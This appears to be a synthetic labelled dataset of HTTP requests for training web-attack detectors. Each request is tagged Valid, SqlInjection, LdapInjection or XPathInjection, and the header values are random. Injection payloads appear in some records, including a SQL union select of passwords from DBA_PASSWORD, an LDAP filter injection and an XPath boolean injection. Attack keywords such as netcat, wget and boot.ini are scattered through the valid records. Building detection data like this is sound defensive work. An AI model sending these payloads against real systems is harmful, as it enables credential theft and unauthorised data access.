GET /1perlx5g4/leiq0ej/tizjcthceglwh/8i0eR/xeor8w6/kvtdf/mtiu/asleter/aioiathbwLI/eiNotnbas8EheRsmrea/d2WTmwElvUNu/mhinnyesIeP.nsf?saFlsiaehN=t4S&sBCehele=acat&mnpfsse13aob=6482&e4eurirr=%3Els&anrsXpwtamam=fhrjpsetcEmochashutdowna+%2BtB7d&xg4Ow.WXNB=7yh0tr%24%27&LZ0gt.rN=ecy+%3Cne+pg HTTP/1.0
Host: www.tlgo.com
Connection: keep-alive
Accept: application/*;q=0.7, image/*
Accept-Charset: x-mac-japanese, iso-8859-2, shift_jis;q=0.4, hz-gb-2312;q=0.7
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 159.79.247.41
Cookie: EpfataeatEo7=2;Dboot.iniQJV8z=uniontemchildete;nemiE54cio3wrxr=+h=lt;bclosteer=Oesbo
Cookie2: $Version="4"
Date: Thu, 19 May 05 22:51:35 CET
ETag: W/"r8h8IhsoOIgJkOKXMA8d"
Expect: 100-continue
From: w2itnteS@3denboi.org
If-Modified-Since: Tue, 22 Apr 08 10:35:21 UTC
If-Unmodified-Since: Thu, 10 Jul 08 21:11:48 GMT
If-Match: "sT8bt9u7vTsP5eF"
If-None-Match: *
If-Range: *
Max-Forwards: 2
MIME-Version: 4.7
Pragma: E='r'
Proxy-Authorization: Digest qop=auth
Authorization: NTLM ZXRzblpjbWVsYnVkRW9lbWFzZHBsdXBhZW90Y3RpbHJndGlo
Range: 112-242,-6,0-
Referer: /oi4t/eaxst8/7iiatd/5shhtg/f24mXyhE.gif
TE: trailers
Trailer: Accept-Language
User-Agent: yulSjihh (eQBfnB9OSq; tb.3rZY3YW; iyvNX1; uTm9MCc; ac2QD3OJP)
UA-CPU: 68000
UA-Disp: 291,6267,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 000x1476
Via: 9.8 143.152.171.150
Transfer-Encoding: deflate
Upgrade: 6apd/1.8, mom/7.8, t9na/9.8, enyx/0.2
Warning: 950 58.210.32.217 "nloesnseoif" "Sun, 08 Apr 07 11:44:10 UTC"
X-Forwarded-For: 11.41.211.10
X-Serial-Number: 1807971586692
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25885
Start - Id: 34435
class: Valid
POST /UYNDI_wherehnetcat7/prYwceclemma/e3/cadayTcoeRtsJemen/toeXus@rFn99uln3k-3/n7SwfhIneaiuh/W1J21WH8SFexec44.js? HTTP/1.1
Content-Length: 249
Content-Language: oARe3e
Content-Encoding: gzip
Content-Location: http://tntn.be/5jimabjs/0han.swf
Content-MD5: d2pkeWdkNXRyaWFlb3J1cw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 21 Apr 09 17:27:19 CET
Last-Modified: Tue, 22 Jan 08 18:27:18 GMT
Host: 199.95.34.148:9
Connection: keep-alive
Accept: audio/*;q=0.5, image/*;q=0.6
Accept-Charset: euc-tw, iso-8859-3;q=0.5
Accept-Encoding: gzip;q=0.9, compress;q=0.4
Accept-Language: w7ta-dswfbepe;q=0.9, py-wioAnh;q=0.3, wEahesd-cE;q=0.1, fo-da;q=0.7, a8c-un;q=0.7
Cache-Control: max-age=49252
Client-ip: 48.191.175.197
Cookie: a75krdhpES=0346228
Cookie2: $Version="501"
Date: Wed, 23 Jul 08 06:43:08 GMT
ETag: W/"kIwl605njO_hAL3BY@8"
Expect: xz4epdk=csynkvu;uisaLsd=eOot4
From: uoYw@lieOqhc.ch
If-Modified-Since: Fri, 28 Oct 05 22:27:26 GMT
If-Unmodified-Since: Fri, 04 Dec 09 24:57:08 GMT
If-Match: "DvhCNCwOgahdJimkGf"
If-None-Match: "dx_iENPGHeTs3C@u49x"
If-Range: *
Max-Forwards: 88
MIME-Version: 8.4
Pragma: eornc='eepttc'
Proxy-Authorization: if1e8w idii=psa0
Authorization: Digest uri=/nn0de/rEaot/rogufger/raGoea/andyi.cfm
Range: 80-9150
Referer: /Hhor.swf
TE: trailers,chunked,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/4.5 (Machintosh; U; Mac OS X 7.1; tn-ij; rv:9.3.9) Gecko/48458973
UA-CPU: StrongARM
UA-Disp: 7247,384,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 840x4922
Via: qlee3i/6.7 www.oolt4a.jpg
Transfer-Encoding: deflate
Upgrade: nnygpo/3.3, eaI/0.2, rgsu/5.5, tsO/7.9, rdq/5.4
Warning: 308 www.np7yn.htm:41 "n0igvvaqAhh5Jitr5oc" "Sat, 07 Mar 09 13:36:33 GMT"
X-Forwarded-For: 229.28.6.246
X-Serial-Number: 22221039836
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1k6Nvc=hcdO&tqjd69yfh0h=nYDZmjj@95AM&zvpy6=aC2hUM&xpihdzLnetdALnm=ontiaeiTiheen9a&x2alo=yryh atto&ea=rtano2 i retdnscriptriv 2&9oesberehiouR=h9eh|et4woptosam&am4o=165552920&enztIeMloo5ndz=3&OhyrR6autNSi=dosoeca0tgtnw5y&deleteMwf7UTZPh=hivdl]kT

End - Id: 34435
Start - Id: 42595
class: SqlInjection
GET /f5cojp.html?7X_MQeu=8979758464&wroEeSc=%27union+++select+++PASSWORD+++from++++DBA_PASSWORD%3B-- HTTP/1.0
Host: 31.9.59.31:2
Connection: keep-alive
Accept: */*
Accept-Charset: big5;q=0.1
Accept-Encoding: compress;q=0.8, identity;q=0.5, identity;q=0.9, gzip;q=0.2
Accept-Language: *;q=0.5
Cache-Control: no-store
Client-ip: 55.246.204.218
Cookie: wealet=798;QmW99QKw82o=n35RQqZQ;sg=nbE3w8lmP-W;llede=959531
Cookie2: $Version="7"
Date: Thu, 12 Jan 06 14:29:29 GMT
ETag: W/"_WHplM6_RQ--ojOH"
Expect: siHyt5
From: cnaraI@oSkg.fr
If-Modified-Since: Sun, 30 Apr 06 17:43:59 CET
If-Unmodified-Since: Tue, 28 Aug 07 05:35:51 CET
If-Match: *
If-None-Match: "4I9CaipdzR6a-G1zIf2"
If-Range: Sun, 24 Apr 05 06:11:36 CET
Max-Forwards: 2
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: Digest uri=http://nr3Iem.de/sromt4Ai.png
Authorization: Basic c3hsc2g3YTpqa2l6UnVtQQ==
Range: 5-,-2176,0697-71705
Referer: http://www.ii4nh.uk/tor18set/o3eose.jpg
TE: gzip;q=0.4
Trailer: Warning
User-Agent: Mozilla/8.4 (compatible; dv8fuiia; Unix; ocsG; coophN9)
UA-CPU: MIPS
UA-Disp: 9729,720,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 4922x3138
Via: 4.1 www.eueiaxaa.css
Transfer-Encoding: identity
Upgrade: ssbcO/5.0, ree/2.7, toscoo/9.9
Warning: 036 28.212.164.74 "g0lq7o" "Thu, 13 Sep 07 02:43:06 UTC"
X-Forwarded-For: 109.45.31.23
X-Serial-Number: 89713741
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42595
Start - Id: 13680
class: Valid
GET /jcAnas6Nmmeziisi/jfk6rlxjgOs0ejvdq7/pXe/eg4noeigqLo5aR9/ncYgsTns9sHaAwsto/2RKuHDdy5gF/ma91BILUAMjs3/3tssisarkhnoie.cfm?eE=mFvwn2w&rqfknhm4ubr=qRl%40GvqT0I&AtshRl=96363&psseDfedr=2064944&BHp-vbscriptrUWK@=+siemxtermos%7Enne&hddtde4t1=%3F+nxaAsnuniontM%7Ctrne&ZtpwtAiA=p3MKbhua&dn=libopuesa&riut2leodreNsh=4660 HTTP/1.1
Host: www.pdptetart.ch:338
Connection: osmr
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: *
Cache-Control: ohhoar='lir8syns'
Client-ip: 106.218.100.226
Cookie: p8id3tui=rtNur8coheuitlnh;NJOqdqtKADx0=61272;yheeycl=uHKdPb1e8.r-;ri2roz=tZzeVu
Cookie2: $Version="4"
Date: Wed, 21 Feb 07 08:15:47 UTC
ETag: W/"7AUnbysWX_rJRTe_V1PF"
Expect: 100-continue
From: oo7g4l@pAu9fultst.biz
If-Modified-Since: Sun, 27 Jul 08 05:09:24 GMT
If-Unmodified-Since: Sat, 07 Jun 08 11:39:15 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 3051
MIME-Version: 4.7
Pragma: eaIici=rsr
Proxy-Authorization: Basic c251dXl0OmdoempzdQ==
Authorization: said eIuSoy2=azt0mlL
Range: -8048,0060-,874395-654763
Referer: http://www.r8zeN0s.de/ThgEadii/ninnOH/rcext/hqjcssa.avi
TE: trailers,trailers
Trailer: Pragma
User-Agent: chyc/9.5
UA-CPU: PowerPC
UA-Disp: 2040,5971,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 947x489
Via: 2.5 www.eob6m.css
Transfer-Encoding: identity
Upgrade: baeo/5.7, Bstoo/9.6, enOenJ/0.8, Tmce/5.1
Warning: 810 233.40.240.2:75910 "hppilonufanrr5o" "Tue, 05 Oct 04 06:33:59 UTC"
X-Forwarded-For: 145.31.187.12
X-Serial-Number: 02500062912801761
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 13680
Start - Id: 8449
class: Valid
GET /wmebal/6HwWpOKfRU9Eu6hcW/jcfXQ/0v6yEQgexecR./oo0f/no1aatfmuocahIa.nsf?1phiia88i7oh=El+n&Eurea0eihen64S=elcH&xyzc0usystem=235058&syoccstor2=z+%3Bor%7Ctl&ahmnneege=eimjtdTr9+&L9SUxinsertQlv=tr1hIlmreo%2BtiMivt&e73esaEnh=xtermi%24cct8tyann+&sneoorntnhkAdM=3821&canfha=xtnr&sVsaNUi0Bznph-=8530743&5hltntmLrnsexpa=osoI&xwsl9heymnicie=%2Fr8x7oi4d&s1droe2wo=hoghhlti2entRhll&li3arrrmeBlqNn=yQH HTTP/1.1
Host: www.vznWa.gov:80
Connection: close
Accept: */*;q=0.0
Accept-Charset: x-mac-arabic;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: max-stale=56
Client-ip: 1.187.91.46
Cookie: eqe=eee6ntesupao;sukIX_B=3043;eLwniCoecme=6524247;dor3rtrpf=12795;pIPc0YQ=td-natiIaa's|
Cookie2: $Version="5"
Date: Mon, 18 Feb 08 06:29:38 UTC
ETag: "Trr9rGLgrZh7gkh"
Expect: 100-continue
From: sHet@bygd.gov
If-Modified-Since: Sat, 21 Apr 07 05:09:59 CET
If-Unmodified-Since: Thu, 05 Jul 07 01:11:12 CET
If-Match: "xlTGcpXpzZ8oM5SvjE@5"
If-None-Match: *
If-Range: Tue, 26 Feb 08 12:16:12 GMT
Max-Forwards: 04
MIME-Version: 1.4
Pragma: lmdm='cbAn2tt'
Proxy-Authorization: NTLM YWU0aTA0amVlc0FvVHVmbzJubW5uVG9lNnZzbEVtdHRoZXJlYWhzc2k=
Authorization: ond4s caXmvm=aret
Range: -418
Referer: /stul/nb3tfrxc/orms8aE/enb8/gqilRtpa.php
TE: trailers
Trailer: From
User-Agent: 72ih (s5Zvugju)
UA-CPU: Sparc
UA-Disp: 3788,441,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 3083x039
Via: 4.8 www.eraio.jpeg:846
Transfer-Encoding: identity
Upgrade: pds/0.2, 5souN/0.2
Warning: 701 www.efiqn.jpg "h2nh5chdrzlef" "Mon, 14 Feb 05 17:53:20 CET"
X-Forwarded-For: 24.38.239.223
X-Serial-Number: 3858691762
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8449
Start - Id: 34174
class: Valid
POST /nrCes0ddsdStod4/dVwoR1n/e.NKyP--lZGekXbA/tYJk_/tS/rXh3/jtetlftcntinoyaiddt.mspx? HTTP/1.0
Content-Length: 27
Content-Language: nsOlbeht,t
Content-Encoding: identity
Content-Location: http://www.pP2mvt.net/m2tg.zip
Content-MD5: dzdFYWFpc2Ewc0llMWNtdA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 17 Jan 08 06:21:18 UTC
Last-Modified: Fri, 19 Aug 05 06:10:36 UTC
Host: www.Hivg.gov
Connection: close
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: identity
Accept-Language: *
Cache-Control: a='s'
Client-ip: 201.97.116.125
Cookie: vwsqse4Ztd=gQF9ew905p0v;http2ebodyZfa6VA=opwutGiNtevoMiyyze;Cj5I=4kdustdhxeOreloon;lomer=2SCCa.7;t4Tlsd4=EhrssiO;g9lR9e6sHtevrws=778693961
Cookie2: $Version="6"
Date: Sun, 19 Mar 06 22:06:23 GMT
ETag: W/"pqMamA4R6r0UMCg.mI6n"
Expect: ehwweaim=idlnwm;ebiez=c4qDn0T
From: hnorDp@dheh.org
If-Modified-Since: Wed, 20 Aug 08 23:02:51 GMT
If-Unmodified-Since: Thu, 11 Mar 10 08:34:31 UTC
If-Match: *
If-None-Match: "EOAQGE9Lq6yb94I0"
If-Range: Tue, 14 Jul 09 05:36:56 GMT
Max-Forwards: 95
MIME-Version: 8.3
Pragma: i='wryv'
Proxy-Authorization: Digest username="pcny3"
Authorization: Basic dGNlZTplTmVvNGU=
Range: -23,3-
Referer: /oiEm7/teEEvE.png
TE: trailers
Trailer: Authorization
User-Agent: Mozilla/1.6 (X11; U; Open BSD i386 1.3; ef-dc; rv:8.0.0) Gecko/79879429
UA-CPU: x86
UA-Disp: 892,7658,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 318x5638
Via: HTTP/5.1 www.Ztia.css:3183, FTP/3.9 157.200.131.103, 2.0 253.231.221.200
Transfer-Encoding: kjfio; aTstatas=o8ts
Upgrade: ciwqt/3.9, Ltten/0.9
Warning: 026 www.euaepe.tiff "E1ssmoL4mnehtgAslnrW" 
X-Forwarded-For: 234.13.70.211
X-Serial-Number: 8391965
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

oeosiaF2to=;jhid(img0x7

End - Id: 34174
Start - Id: 38079
class: LdapInjection
GET /bbgsoundJ/0YselectvbMmsAl/2ryxN_a7gNdnQ-L13/mooez/dGjH-eK/rvIA/e5Vlu9vtOX1euwCh/uUk7nici7/aeaeEueg/nhTakfjTi4e1afOzV/oBxW/WRhcatUY.bin?QDstylegjZVscriptDsAwget=a9Za&dhaexiveera=jHo3Y&ioauaeegiahroao=86171905&itzwohotg=Dnnslrslda8epy&UHNC7xidQU=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&h3jyMi=lqathatmdo&sdNa=307233&Rcrll=M&dhdo5das=8989778327&vhidht=5 HTTP/1.0
Host: www.eqie.biz
Connection: close
Accept: text/*;q=0.5, text/html;q=0.8, application/x-tar;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: uf-lno
Cache-Control: max-age=70
Client-ip: 114.76.49.126
Cookie: whereE@G.=04126;trinsnrI=lza& oNim4e7ama;EJUmnYohaT2=76715;.Mzeeypz=drop
Cookie2: $Version="085"
Date: Sat, 30 Apr 05 01:29:29 CET
ETag: W/"Kjx65r3FGnJZRJH"
Expect: 100-continue
From: zfmmsal@ymhqo.ch
If-Modified-Since: Sun, 25 Jul 04 18:05:22 CET
If-Unmodified-Since: Fri, 05 Sep 08 23:36:12 CET
If-Match: *
If-None-Match: "ubuvWY1Vl3AJgZ8maMTo"
If-Range: Tue, 01 Jun 04 18:19:53 CET
Max-Forwards: 8
MIME-Version: 7.3
Pragma: og='ohhilh'
Proxy-Authorization: Basic cm5pZXVqOmh0bXM=
Authorization: Basic dGpvZURvOnZmYXN1N20=
Range: 77-,76-
Referer: http://www.nemn.be/eFnulfxn/tmfyco/aonn/oybtahny/snnQafs.php
TE: trailers
Trailer: Pragma
User-Agent: Mozilla/7.7 (X11; U; Open BSD i386 8.8; hh-ge; rv:6.2.9) Gecko/18200972
UA-CPU: Sparc
UA-Disp: 119,1491,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 3700x2595
Via: FTP/7.2 www.ic0g5o5.html, 4.7 138.78.88.157, aio/0.7 www.udsoZl.htm
Transfer-Encoding: identity
Upgrade: sS7i/3.2, haaoxa/5.4, fair/8.2
Warning: 290 www.isci.css:805 "iIseaaalda5ig" "Wed, 15 Oct 08 18:13:14 GMT"
X-Forwarded-For: 67.89.141.76
X-Serial-Number: 814494240740
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38079
Start - Id: 33002
class: Valid
POST /fRD0SS6XHrzDIQ/qY.htm? HTTP/1.1
Content-Length: 58
Content-Language: Lytu,wher,srRsf
Content-Encoding: compress
Content-Location: http://www.raapiaay.gov/wtAai20r/d2osiei4/ltib4ese.htm
Content-MD5: Q2JhM3JCd3B2YWl0cG9zcA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 01 May 10 13:29:49 UTC
Last-Modified: Fri, 14 Jul 06 04:27:36 GMT
Host: 252.72.53.202
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: cp-936;q=0.8
Accept-Encoding: 
Accept-Language: utoaj-tecf;q=0.7
Cache-Control: max-age=71496
Client-ip: 64.219.84.148
Cookie: rmnMTd=0568;aat=4eieOg(0ugo;ln=hnuboinhbraechuo;Rxf1qij=70707;vtanctinRw=5;HV3Jaccept=618762
Cookie2: $Version="9"
Date: Fri, 15 Apr 05 22:03:29 CET
ETag: W/"01aqMSw7Vx@CbRYaUY-"
Expect: lea4e
From: eeo4emN@ig0loe4s.de
If-Modified-Since: Thu, 18 Aug 05 10:09:22 UTC
If-Unmodified-Since: Tue, 14 Sep 04 22:49:06 UTC
If-Match: "BB.9RzU1-vI8Lh.U5id"
If-None-Match: "lZr_ht9FAup64Fvezw7"
If-Range: Mon, 09 Feb 04 18:47:31 GMT
Max-Forwards: 90
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: hhFHT hdinre=f4edi9s
Authorization: NTLM bm9hZ2l0OXZlMThudWE1MGNzVWFuUmlldG5leGNwaTBhZUQ=
Range: 7-,6-
Referer: http://weimet.fr/aastree/96ijenve/inuLsv0L/En661nle.pl
TE: trailers
Trailer: Proxy-Authorization
User-Agent: rgIa0se (rhZ95nyYH; hrLv10oKb; jkW4Rj7SG; t5-A5vz)
UA-CPU: MIPS
UA-Disp: 0209,118,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 0187x7765
Via: HTTP/3.8 156.198.4.15, nCt/8.8 www.rkTudnu.shtml
Transfer-Encoding: deflate
Upgrade: 4tk/6.6
Warning: 960 www.dvr2eom.js:20 "esme5cmn4diad" 
X-Forwarded-For: 225.92.175.53
X-Serial-Number: 509651
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

lsioy91rO=hhepaYoayonnsE&nROu8C_=ritZ&stmsghfWbrcE6he=utfl

End - Id: 33002
Start - Id: 12132
class: Valid
GET /s2wAQywtJHyDTsOCM/uhsjkl6Ee-sk5ghOqw@g/aWIs7/eV/l9QEfshutdownBloguMBTf0i.exe? HTTP/1.1
Host: 83.58.12.210
Connection: 2triae
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: only-if-cached
Client-ip: 100.77.148.18
Cookie: 2iaAbsUOetce=drioohlte;lulnt=0709488621;V7FcathtpassscriptXh6Gk=qcwe;nhIbezI2jh2o=eUO5O
Cookie2: $Version="1"
Date: Sat, 29 Oct 05 22:33:15 GMT
ETag: W/"QRTugnwI4TSG7q17by"
Expect: xtnxv5a
From: urenjygt@RCw5vc.uk
If-Modified-Since: Sun, 28 Aug 05 23:53:40 CET
If-Unmodified-Since: Fri, 26 Sep 08 19:54:54 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 30 Jan 04 03:15:52 CET
Max-Forwards: 6
MIME-Version: 4.2
Pragma: 18hhr=edaeo
Proxy-Authorization: Digest nonce
Authorization: sutc tnjka5ea=oetfo
Range: 2-
Referer: /jnatbud/pFdl/UuqWtey/acfe3Ahq/hirhote.pdf
TE: trailers,gzip;q=0.2,trailers
Trailer: Cache-Control
User-Agent: heieueb4e
UA-CPU: MIPS
UA-Disp: 3494,5887,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 556x8407
Via: 9.0 www.yrfkhS.css, tjgho/6.5 www.rd5E.shtml:0, HTTP/4.7 65.31.79.252
Transfer-Encoding: identity
Upgrade: Cdr/9.5, gton/2.2
Warning: 633 208.217.55.100 "oooedreIyoibnl" 
X-Forwarded-For: 114.221.1.72
X-Serial-Number: 180006771831212
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12132
Start - Id: 176
class: Valid
GET /r@58tUKm@MSy/s6Hq1s/enczilazaeo/ObBg7dWixOwgetbNEstdin/2Zluq3K74D2NlfTI58m.jpeg?cEses=493343113&rptcifarolpm=684&tfuE=7411075&cseufsaowR=nZ3ByAg3cLz&OzjY-R=eHsuny2nerwindow.openas&accept0.oULYlov7=65049037&uax96null=nMrhqoaexec6ewy%2Buk%25u&Npdeas=tee%3Enr%3Bj%5D&pipsetnpiao8h=o9Wz&sih=DrapTlaswbe%28ns4 HTTP/1.0
Host: www.reun3euwcD.ch:9
Connection: keep-alive
Accept: */*
Accept-Charset: utf-7;q=0.0, us-ascii, euc-jp;q=0.7, iso-8859-1;q=0.1
Accept-Encoding: compress;q=0.4, deflate;q=0.6, deflate, identity
Accept-Language: zan1oO-wcsp, aqc-eo, Nx-omt, hY-sanx6pb3;q=0.9
Cache-Control: no-store
Client-ip: 49.228.57.192
Cookie: rezeo=olras;Q9u3Ynui=1p7rYqAgnuz;neu9biaancvca=<eeSpewssei
Cookie2: $Version="125"
Date: Thu, 17 May 07 02:53:57 GMT
ETag: "iwEQDomc_EVyXLZEuZh"
Expect: t4re8ds
From: tltsq@ehwscntW9.gov
If-Modified-Since: Sat, 22 Jan 05 11:45:52 CET
If-Unmodified-Since: Mon, 11 May 09 16:47:33 CET
If-Match: *
If-None-Match: "Tp5ep4k8FkK8zXsiP98z"
If-Range: Thu, 07 Oct 04 21:56:54 UTC
Max-Forwards: 7272
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Basic b25sZDpvcm51bw==
Range: 11-475428,-94372
Referer: http://daohehae.fr/oaures/1stap/cargin.aspx
TE: deflate;q=0.0,gzip
Trailer: Connection
User-Agent: Mozilla/3.7 (Machintosh; U; Mac OS X 6.6; sl-Ti; rv:4.7.4) Gecko/43756902
UA-CPU: MIPS
UA-Disp: 1257,262,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 7281x9184
Via: HTTP/6.4 www.mrnql.htm, FTP/1.8 www.cieUml.css, FTP/5.0 144.166.110.225:5482
Transfer-Encoding: gzip
Upgrade: ahei/7.4, ea4eeh/0.5, diptss/4.0, ensoe3/8.3
Warning: 367 www.lqnT2.htm "rqtcera" 
X-Forwarded-For: 7.28.176.57
X-Serial-Number: 3449007851195603
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 176
Start - Id: 35821
class: XPathInjection
GET /RenmH/cXgZO1Rwpa/g11LzlocationwhereQkQ4_q/8PSFd/mNQk/leEce/enefuWhuschnlrLAyC/QMEx9Zzk2Yf/Esock_streamf/G10GmdXltTiframeKz.pl?vfpjama=ae6eeaspet&sia=3y&4hafeetcM0rnrrc=5&ctiseeids5lXag=343&oricOiws=link+lh&ea=+oopentc&tkrs=ak7y5A&fhoensuowsoau=y3I%40gnp&tDst8r=65&AvdirH=rlaS%2Ft%2Fr5nEfe%2Fchild%3A%3Anode%28%29%5B++position%28%29%3D3%5D+++++%7C++++KsnfHi%2Fv3%2Fc%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D3%5D++or+%27nletxi%27++++%3D%27&8nuheo2iseni=xie%2Fo&BNLHCo=rnw&fyNzrsna=se5 HTTP/1.1
Host: www.taehihp.fr
Connection: close
Accept: */*;q=0.5
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 46.200.186.58
Cookie: o7zeida1rmsonle=ts3edH1cisfseSe5te;vEGcn=dassntoArUiFe;dsClr=wglrlt4d8awfnr5hae;2c3oIgrZora=pd$o;nc6=bZ00l
Cookie2: $Version="2"
Date: Thu, 14 Apr 05 03:21:08 GMT
ETag: W/"lpsbtCm1cdq5sF5ek"
Expect: 100-continue
From: a2frd@mttrrPoVI.gov
If-Modified-Since: Sun, 16 Jan 05 02:53:56 GMT
If-Unmodified-Since: Mon, 27 Aug 07 21:33:03 UTC
If-Match: "OZ1Md3zff@LVMyik2"
If-None-Match: ".r3e3CHqbzOuN@LL"
If-Range: Thu, 08 May 08 14:51:39 GMT
Max-Forwards: 5
MIME-Version: 2.2
Pragma: rdtriN=ia0dhoi
Proxy-Authorization: luLc Okt8e=3llo
Authorization: Digest opaque="7cyd"
Range: 205-0247
Referer: http://igtnmmi.fr/Rdsdd/eldetedi/heBzccm.cgi
TE: trailers,trailers
Trailer: Via
User-Agent: Mozilla/5.5 (compatible; MSIE 9.4; Linux i386; ybetbmro; 6utniner)
UA-CPU: x86
UA-Disp: 747,476,16
UA-OS: Linux
UA-Pixels: 4135x5853
Via: enaEsh/7.3 93.96.205.177:2, FTP/9.8 137.136.214.140, 9.5 www.bhth8ims.png:438
Transfer-Encoding: compress
Upgrade: oyytm/9.6, hhc/4.5, Ojwace/7.1, toww7E/9.4
Warning: 351 24.73.41.38:3 "Asogrdto" 
X-Forwarded-For: 43.11.206.228
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35821
Start - Id: 16735
class: Valid
GET /2DA73/5nhefkhaw/eL1GGxHsQ/f960XZhnjMTHVnQTuB/im/Y@H9O_7x/8F1qLovdAU/hWrdo@UV/eG@P305IcClG..cfm?aTid1t=9 HTTP/1.0
Host: www.hFonik.de
Connection: lnenl0
Accept: video/*;q=0.5, application/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 107.56.49.177
Cookie: 2OteAanseata=16604618;dKXM=ocee;szzihyy9ct=Eeh6e1etzEans
Cookie2: $Version="75"
Date: Sat, 29 Aug 09 05:51:06 CET
ETag: "PKL-3Ymhj7vA_z3nW"
Expect: 100-continue
From: qsiyd@ithlh90i.biz
If-Modified-Since: Fri, 12 Mar 04 10:20:00 GMT
If-Unmodified-Since: Thu, 27 Apr 06 15:16:43 UTC
If-Match: "8E9eHUOLE_9X_UvWBZnW"
If-None-Match: *
If-Range: *
Max-Forwards: 4
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: Basic cmVEYmllajpIYWVkNGFpZA==
Authorization: ml29ci nipB6=teftv8d
Range: 4-,-5,062040-983
Referer: http://mrizy.com/k7hwa/tEOe/uulgooyd/eih2ae/auOd.asp
TE: trailers,trailers
Trailer: If-Range
User-Agent: nbo-YrOluF http://www.samr.uk
UA-CPU: x86
UA-Disp: 3273,598,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 1249x2317
Via: 9.6 145.153.109.177, FTP/2.0 www.pCwv.html, 3.2 149.217.178.225:690
Transfer-Encoding: tseni5; nyNst6=sdait
Upgrade: wsgnwl/0.0, 7nltw/5.0, 7ai/7.4, rhRh/3.3, eMvtpm/2.1
Warning: 082 www.cyawd.gif "ulhshseXosaHnh3a" "Wed, 29 Jun 05 18:19:58 CET"
X-Forwarded-For: 125.30.59.190
X-Serial-Number: 585140076554
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16735
Start - Id: 4225
class: Valid
PUT /GSxIPBZiframeC5AWYy/l5ptmpU2NRZxkxF/qfefmbnsttnrJdhsua/oVzUlS0ewd/re69hsdten79mUhmeii/zn6vaaBm/t5ho.aspx? HTTP/1.0
Content-Length: 76
Content-Language: Amr,kap,nt
Content-Encoding: identity
Content-Location: /S9wDsuc1/qhiSOss/oqlaoa/ldeXtm/mihsoo4.swf
Content-MD5: YWk2aGFtc2E2MzdydGVocg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 23 Feb 09 10:04:37 UTC
Last-Modified: Tue, 05 Feb 08 06:13:21 GMT
Host: www.s4mnaan.st
Connection: keep-alive
Accept: */*
Accept-Charset: cp-950;q=0.1
Accept-Encoding: compress;q=0.4, gzip;q=0.0
Accept-Language: *
Cache-Control: max-stale
Client-ip: 246.212.211.51
Cookie: 4adminhavingwinnt=?m;smsSrvNreluo=rdts4t;rae7j4TebnLav=tdOwlpte
Cookie2: $Version="028"
Date: Wed, 25 Jun 08 18:57:31 CET
ETag: W/"X-Jc8ESdz7CYeWwj"
Expect: 100-continue
From: hjihe3k@naahlyi3u2.ch
If-Modified-Since: Mon, 13 Nov 06 20:02:17 UTC
If-Unmodified-Since: Tue, 21 Mar 06 02:58:31 CET
If-Match: *
If-None-Match: "7DQgvaK027YjipoHa"
If-Range: *
Max-Forwards: 39
MIME-Version: 0.5
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest username="a4tnm"
Range: 936255-,7-,-5
Referer: http://www.issE.biz/tytest/d4helS/6dro/6Tda/nHxww.tar
TE: trailers
Trailer: Range
User-Agent: Mozilla/0.0 (compatible; MSIE 4.2; Open BSD i386; etxntx; tIfaen9ls)
UA-CPU: x86
UA-Disp: 030,366,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 2347x8013
